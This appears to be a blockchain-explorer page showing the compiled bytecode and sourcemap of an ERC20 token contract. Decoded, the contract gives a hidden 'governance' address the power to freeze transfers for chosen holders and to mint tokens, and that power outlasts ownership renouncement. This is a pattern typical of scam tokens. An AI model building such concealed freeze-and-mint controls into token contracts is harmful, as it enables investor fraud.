ffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611341576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113389061192b565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818111156113c8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113bf9061186b565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161146c91906119cb565b60405180910390a3505050565b505050565b505050565b60008135905061149281611f2f565b92915050565b6000813590506114a781611f46565b92915050565b6000602082840312156114c3576114c2611b8b565b5b60006114d184828501611483565b91505092915050565b600080604083850312156114f1576114f0611b8b565b5b60006114ff85828601611483565b925050602061151085828601611483565b9150509250929050565b60008060006060848603121561153357611532611b8b565b5b600061154186828701611483565b935050602061155286828701611483565b925050604061156386828701611498565b9150509250925092565b6000806040838503121561158457611583611b8b565b5b600061159285828601611483565b92505060206115a385828601611498565b9150509250929050565b6000602082840312156115c3576115c2611b8b565b5b60006115d184828501611498565b91505092915050565b6115e381611a73565b82525050565b6115f281611a85565b82525050565b600061160382611a01565b61160d8185611a0c565b935061161d818560208601611ac8565b61162681611b90565b840191505092915050565b600061163e602383611a0c565b915061164982611ba1565b604082019050919050565b6000611661602283611a0c565b915061166c82611bf0565b604082019050919050565b6000611684602283611a0c565b915061168f82611c3f565b604082019050919050565b60006116a7602883611a0c565b91506116b282611c8e565b604082019050919050565b60006116ca602683611a0c565b91506116d582611cdd565b604082019050919050565b60006116ed602883611a0c565b91506116f882611d2c565b604082019050919050565b6000611710602083611a0c565b915061171b82611d7b565b602082019050919050565b6000611733602183611a0c565b915061173e82611da4565b604082019050919050565b6000611756602583611a0c565b915061176182611df3565b604082019050919050565b6000611779602483611a0c565b915061178482611e42565b604082019050919050565b600061179c602783611a0c565b91506117a782611e91565b604082019050919050565b60006117bf602583611a0c565b91506117ca82611ee0565b604082019050919050565b6117de81611ab1565b82525050565b6117ed81611abb565b82525050565b600060208201905061180860008301846115da565b92915050565b600060208201905061182360008301846115e9565b92915050565b6000602082019050818103600083015261184381846115f8565b905092915050565b6000602082019050818103600083015261186481611631565b9050919050565b6000602082019050818103600083015261188481611654565b9050919050565b600060208201905081810360008301526118a481611677565b9050919050565b600060208201905081810360008301526118c48161169a565b9050919050565b600060208201905081810360008301526118e4816116bd565b9050919050565b60006020820190508181036000830152611904816116e0565b9050919050565b6000602082019050818103600083015261192481611703565b9050919050565b6000602082019050818103600083015261194481611726565b9050919050565b6000602082019050818103600083015261196481611749565b9050919050565b600060208201905081810360008301526119848161176c565b9050919050565b600060208201905081810360008301526119a48161178f565b9050919050565b600060208201905081810360008301526119c4816117b2565b9050919050565b60006020820190506119e060008301846117d5565b92915050565b60006020820190506119fb60008301846117e4565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611a2882611ab1565b9150611a3383611ab1565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a6857611a67611b2d565b5b828201905092915050565b6000611a7e82611a91565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611ae6578082015181840152602081019050611acb565b83811115611af5576000848401525b50505050565b60006002820490506001821680611b1357607f821691505b60208210811415611b2757611b26611b5c565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f476f7665726e616e63653a2063616c6c6572206973206e6f742074686520676f60008201527f7665726e616e6365000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f7574206578636565647320616c60008201527f6c6f77616e636500000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611f3881611a73565b8114611f4357600080fd5b50565b611f4f81611ab1565b8114611f5a57600080fd5b5056fea26469706673582212202e0b785053a6f5c8a840967e9b331d686a348245ce162add52c2013c76dd761364736f6c63430008050033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a257806397541e9f1161007157806397541e9f146102bc5780639a181332146102d8578063a457c2d7146102f4578063a9059cbb14610324578063dd62ed3e146103545761010b565b8063715018a61461025a5780638426e6c1146102645780638da5cb5b1461028057806395d89b411461029e5761010b565b80632b603c71116100de5780632b603c71146101ac578063313ce567146101dc57806339509351146101fa57806370a082311461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611829565b60405180910390f35b6101486004803603810190610143919061156d565b610416565b604051610155919061180e565b60405180910390f35b610166610434565b60405161017391906119cb565b60405180910390f35b6101966004803603810190610191919061151a565b61043e565b6040516101a3919061180e565b60405180910390f35b6101c660048036038101906101c191906114ad565b610536565b6040516101d3919061180e565b60405180910390f35b6101e461058c565b6040516101f191906119e6565b60405180910390f35b610214600480360381019061020f919061156d565b610595565b604051610221919061180e565b60405180910390f35b610244600480360381019061023f91906114ad565b610641565b60405161025191906119cb565b60405180910390f35b61026261068a565b005b61027e600480360381019061027991906114ad565b610712565b005b61028861082d565b60405161029591906117f3565b60405180910390f35b6102a6610856565b6040516102b39190611829565b60405180910390f35b6102d660048036038101906102d191906114ad565b6108e8565b005b6102f260048036038101906102ed91906115ad565b610a91565b005b61030e6004803603810190610309919061156d565b610b3c565b60405161031b919061180e565b60405180910390f35b61033e6004803603810190610339919061156d565b610c27565b60405161034b919061180e565b60405180910390f35b61036e600480360381019061036991906114da565b610c45565b60405161037b91906119cb565b60405180910390f35b60606006805461039390611afb565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf90611afb565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600061042a610423610ccc565b8484610cd4565b6001905092915050565b6000600554905090565b600061044b848484610e9f565b6000600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610496610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610516576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161050d906118eb565b60405180910390fd5b61052a85610522610ccc565b858403610cd4565b60019150509392505050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60006009905090565b60006106376105a2610ccc565b8484600460006105b0610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106329190611a1d565b610cd4565b6001905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610692610ccc565b73ffffffffffffffffffffffffffffffffffffffff166106b061082d565b73ffffffffffffffffffffffffffffffffffffffff1614610706576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106fd9061190b565b60405180910390fd5b610710600061120d565b565b61071a610ccc565b73ffffffffffffffffffffffffffffffffffffffff1661073861082d565b73ffffffffffffffffffffffffffffffffffffffff161461078e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107859061190b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107e957600080fd5b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606007805461086590611afb565b80601f016020809104026020016040519081016040528092919081815260200182805461089190611afb565b80156108de5780601f106108b3576101008083540402835291602001916108de565b820191906000526020600020905b8154815290600101906020018083116108c157829003601f168201915b5050505050905090565b6108f0610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461097f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610976906118ab565b60405180910390fd5b60011515600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151415610a35576000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610a8e565b6001600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b610a99610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b1f906118ab565b60405180910390fd5b610b39610b33610ccc565b826112d1565b50565b60008060046000610b4b610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bff906119ab565b60405180910390fd5b610c1c610c13610ccc565b85858403610cd4565b600191505092915050565b6000610c3b610c34610ccc565b8484610e9f565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3b9061196b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610db4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dab9061188b565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e9291906119cb565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f069061194b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f7f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f769061184b565b60405180910390fd5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806110205750600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110695760008114611068576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105f9061198b565b60405180910390fd5b5b611074838383611479565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156110fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f2906118cb565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546111909190611a1d565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111f491906119cb565b60405180910390a361120784848461147e565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611341576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113389061192b565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818111156113c8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113bf9061186b565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161146c91906119cb565b60405180910390a3505050565b505050565b505050565b60008135905061149281611f2f565b92915050565b6000813590506114a781611f46565b92915050565b6000602082840312156114c3576114c2611b8b565b5b60006114d184828501611483565b91505092915050565b600080604083850312156114f1576114f0611b8b565b5b60006114ff85828601611483565b925050602061151085828601611483565b9150509250929050565b60008060006060848603121561153357611532611b8b565b5b600061154186828701611483565b935050602061155286828701611483565b925050604061156386828701611498565b9150509250925092565b6000806040838503121561158457611583611b8b565b5b600061159285828601611483565b92505060206115a385828601611498565b9150509250929050565b6000602082840312156115c3576115c2611b8b565b5b60006115d184828501611498565b91505092915050565b6115e381611a73565b82525050565b6115f281611a85565b82525050565b600061160382611a01565b61160d8185611a0c565b935061161d818560208601611ac8565b61162681611b90565b840191505092915050565b600061163e602383611a0c565b915061164982611ba1565b604082019050919050565b6000611661602283611a0c565b915061166c82611bf0565b604082019050919050565b6000611684602283611a0c565b915061168f82611c3f565b604082019050919050565b60006116a7602883611a0c565b91506116b282611c8e565b604082019050919050565b60006116ca602683611a0c565b91506116d582611cdd565b604082019050919050565b60006116ed602883611a0c565b91506116f882611d2c565b604082019050919050565b6000611710602083611a0c565b915061171b82611d7b565b602082019050919050565b6000611733602183611a0c565b915061173e82611da4565b604082019050919050565b6000611756602583611a0c565b915061176182611df3565b604082019050919050565b6000611779602483611a0c565b915061178482611e42565b604082019050919050565b600061179c602783611a0c565b91506117a782611e91565b604082019050919050565b60006117bf602583611a0c565b91506117ca82611ee0565b604082019050919050565b6117de81611ab1565b82525050565b6117ed81611abb565b82525050565b600060208201905061180860008301846115da565b92915050565b600060208201905061182360008301846115e9565b92915050565b6000602082019050818103600083015261184381846115f8565b905092915050565b6000602082019050818103600083015261186481611631565b9050919050565b6000602082019050818103600083015261188481611654565b9050919050565b600060208201905081810360008301526118a481611677565b9050919050565b600060208201905081810360008301526118c48161169a565b9050919050565b600060208201905081810360008301526118e4816116bd565b9050919050565b60006020820190508181036000830152611904816116e0565b9050919050565b6000602082019050818103600083015261192481611703565b9050919050565b6000602082019050818103600083015261194481611726565b9050919050565b6000602082019050818103600083015261196481611749565b9050919050565b600060208201905081810360008301526119848161176c565b9050919050565b600060208201905081810360008301526119a48161178f565b9050919050565b600060208201905081810360008301526119c4816117b2565b9050919050565b60006020820190506119e060008301846117d5565b92915050565b60006020820190506119fb60008301846117e4565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611a2882611ab1565b9150611a3383611ab1565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a6857611a67611b2d565b5b828201905092915050565b6000611a7e82611a91565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611ae6578082015181840152602081019050611acb565b83811115611af5576000848401525b50505050565b60006002820490506001821680611b1357607f821691505b60208210811415611b2757611b26611b5c565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f476f7665726e616e63653a2063616c6c6572206973206e6f742074686520676f60008201527f7665726e616e6365000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f7574206578636565647320616c60008201527f6c6f77616e636500000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611f3881611a73565b8114611f4357600080fd5b50565b611f4f81611ab1565b8114611f5a57600080fd5b5056fea26469706673582212202e0b785053a6f5c8a840967e9b331d686a348245ce162add52c2013c76dd761364736f6c63430008050033

Deployed Bytecode Sourcemap

20941:337:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11225:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13922:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12344:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14573:492;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12938:109;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12187:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15474:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12515:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8978:103;;;:::i;:::-;;8485:142;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7881:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11444:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12659:178;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13449:112;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;16192:413;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13260:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13624:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11225:100;11279:13;11312:5;11305:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11225:100;:::o;13922:169::-;14005:4;14022:39;14031:12;:10;:12::i;:::-;14045:7;14054:6;14022:8;:39::i;:::-;14079:4;14072:11;;13922:169;;;;:::o;12344:108::-;12405:7;12432:12;;12425:19;;12344:108;:::o;14573:492::-;14713:4;14730:36;14740:6;14748:9;14759:6;14730:9;:36::i;:::-;14779:24;14806:11;:19;14818:6;14806:19;;;;;;;;;;;;;;;:33;14826:12;:10;:12::i;:::-;14806:33;;;;;;;;;;;;;;;;14779:60;;14878:6;14858:16;:26;;14850:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;14965:57;14974:6;14982:12;:10;:12::i;:::-;15015:6;14996:16;:25;14965:8;:57::i;:::-;15053:4;15046:11;;;14573:492;;;;;:::o;12938:109::-;12996:4;13020:10;:19;13031:7;13020:19;;;;;;;;;;;;;;;;;;;;;;;;;13013:26;;12938:109;;;:::o;12187:92::-;12245:5;12270:1;12263:8;;12187:92;:::o;15474:215::-;15562:4;15579:80;15588:12;:10;:12::i;:::-;15602:7;15648:10;15611:11;:25;15623:12;:10;:12::i;:::-;15611:25;;;;;;;;;;;;;;;:34;15637:7;15611:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;15579:8;:80::i;:::-;15677:4;15670:11;;15474:215;;;;:::o;12515:127::-;12589:7;12616:9;:18;12626:7;12616:18;;;;;;;;;;;;;;;;12609:25;;12515:127;;;:::o;8978:103::-;8112:12;:10;:12::i;:::-;8101:23;;:7;:5;:7::i;:::-;:23;;;8093:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9043:30:::1;9070:1;9043:18;:30::i;:::-;8978:103::o:0;8485:142::-;8112:12;:10;:12::i;:::-;8101:23;;:7;:5;:7::i;:::-;:23;;;8093:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8584:1:::1;8561:25;;:11;;;;;;;;;;;:25;;;8552:35;;;::::0;::::1;;8612:7;8598:11;;:21;;;;;;;;;;;;;;;;;;8485:142:::0;:::o;7881:87::-;7927:7;7954:6;;;;;;;;;;;7947:13;;7881:87;:::o;11444:104::-;11500:13;11533:7;11526:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11444:104;:::o;12659:178::-;8344:12;:10;:12::i;:::-;8329:27;;:11;;;;;;;;;;;:27;;;8321:80;;;;;;;;;;;;:::i;:::-;;;;;;;;;12758:4:::1;12735:27;;:10;:19;12746:7;12735:19;;;;;;;;;;;;;;;;;;;;;;;;;:27;;;12731:99;;;12787:5;12765:10;:19;12776:7;12765:19;;;;;;;;;;;;;;;;:27;;;;;;;;;;;;;;;;;;12731:99;;;12823:4;12801:10;:19;12812:7;12801:19;;;;;;;;;;;;;;;;:26;;;;;;;;;;;;;;;;;;12731:99;12659:178:::0;:::o;13449:112::-;8344:12;:10;:12::i;:::-;8329:27;;:11;;;;;;;;;;;:27;;;8321:80;;;;;;;;;;;;:::i;:::-;;;;;;;;;13526:27:::1;13532:12;:10;:12::i;:::-;13546:6;13526:5;:27::i;:::-;13449:112:::0;:::o;16192:413::-;16285:4;16302:24;16329:11;:25;16341:12;:10;:12::i;:::-;16329:25;;;;;;;;;;;;;;;:34;16355:7;16329:34;;;;;;;;;;;;;;;;16302:61;;16402:15;16382:16;:35;;16374:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;16495:67;16504:12;:10;:12::i;:::-;16518:7;16546:15;16527:16;:34;16495:8;:67::i;:::-;16593:4;16586:11;;;16192:413;;;;:::o;13260:175::-;13346:4;13363:42;13373:12;:10;:12::i;:::-;13387:9;13398:6;13363:9;:42::i;:::-;13423:4;13416:11;;13260:175;;;;:::o;13624:151::-;13713:7;13740:11;:18;13752:5;13740:18;;;;;;;;;;;;;;;:27;13759:7;13740:27;;;;;;;;;;;;;;;;13733:34;;13624:151;;;;:::o;4173:98::-;4226:7;4253:10;4246:17;;4173:98;:::o;19184:380::-;19337:1;19320:19;;:5;:19;;;;19312:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19418:1;19399:21;;:7;:21;;;;19391:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19502:6;19472:11;:18;19484:5;19472:18;;;;;;;;;;;;;;;:27;19491:7;19472:27;;;;;;;;;;;;;;;:36;;;;19540:7;19524:32;;19533:5;19524:32;;;19549:6;19524:32;;;;;;:::i;:::-;;;;;;;;19184:380;;;:::o;17095:875::-;17253:1;17235:20;;:6;:20;;;;17227:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;17337:1;17316:23;;:9;:23;;;;17308:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;17394:10;:18;17405:6;17394:18;;;;;;;;;;;;;;;;;;;;;;;;;:43;;;;17416:10;:21;17427:9;17416:21;;;;;;;;;;;;;;;;;;;;;;;;;17394:43;17390:123;;;17468:1;17458:6;:11;17449:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;17390:123;17534:47;17555:6;17563:9;17574:6;17534:20;:47::i;:::-;17594:21;17618:9;:17;17628:6;17618:17;;;;;;;;;;;;;;;;17594:41;;17671:6;17654:13;:23;;17646:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;17792:6;17776:13;:22;17756:9;:17;17766:6;17756:17;;;;;;;;;;;;;;;:42;;;;17844:6;17820:9;:20;17830:9;17820:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;17885:9;17868:35;;17877:6;17868:35;;;17896:6;17868:35;;;;;;:::i;:::-;;;;;;;;17916:46;17936:6;17944:9;17955:6;17916:19;:46::i;:::-;17216:754;17095:875;;;:::o;9241:191::-;9315:16;9334:6;;;;;;;;;;;9315:25;;9360:8;9351:6;;:17;;;;;;;;;;;;;;;;;;9415:8;9384:40;;9405:8;9384:40;;;;;;;;;;;;9304:128;9241:191;:::o;18303:443::-;18406:1;18387:21;;:7;:21;;;;18379:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;18459:22;18484:9;:18;18494:7;18484:18;;;;;;;;;;;;;;;;18459:43;;18539:6;18521:14;:24;;18513:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;18658:6;18641:14;:23;18620:9;:18;18630:7;18620:18;;;;;;;;;;;;;;;:44;;;;18727:1;18701:37;;18710:7;18701:37;;;18731:6;18701:37;;;;;;:::i;:::-;;;;;;;;18368:378;18303:443;;:::o;20122:125::-;;;;:::o;20810:124::-;;;;:::o;7:139:1:-;53:5;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;198:5;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:329::-;356:6;405:2;393:9;384:7;380:23;376:32;373:2;;;411:79;;:::i;:::-;373:2;531:1;556:53;601:7;592:6;581:9;577:22;556:53;:::i;:::-;546:63;;502:117;363:263;;;;:::o;632:474::-;700:6;708;757:2;745:9;736:7;732:23;728:32;725:2;;;763:79;;:::i;:::-;725:2;883:1;908:53;953:7;944:6;933:9;929:22;908:53;:::i;:::-;898:63;;854:117;1010:2;1036:53;1081:7;1072:6;1061:9;1057:22;1036:53;:::i;:::-;1026:63;;981:118;715:391;;;;;:::o;1112:619::-;1189:6;1197;1205;1254:2;1242:9;1233:7;1229:23;1225:32;1222:2;;;1260:79;;:::i;:::-;1222:2;1380:1;1405:53;1450:7;1441:6;1430:9;1426:22;1405:53;:::i;:::-;1395:63;;1351:117;1507:2;1533:53;1578:7;1569:6;1558:9;1554:22;1533:53;:::i;:::-;1523:63;;1478:118;1635:2;1661:53;1706:7;1697:6;1686:9;1682:22;1661:53;:::i;:::-;1651:63;;1606:118;1212:519;;;;;:::o;1737:474::-;1805:6;1813;1862:2;1850:9;1841:7;1837:23;1833:32;1830:2;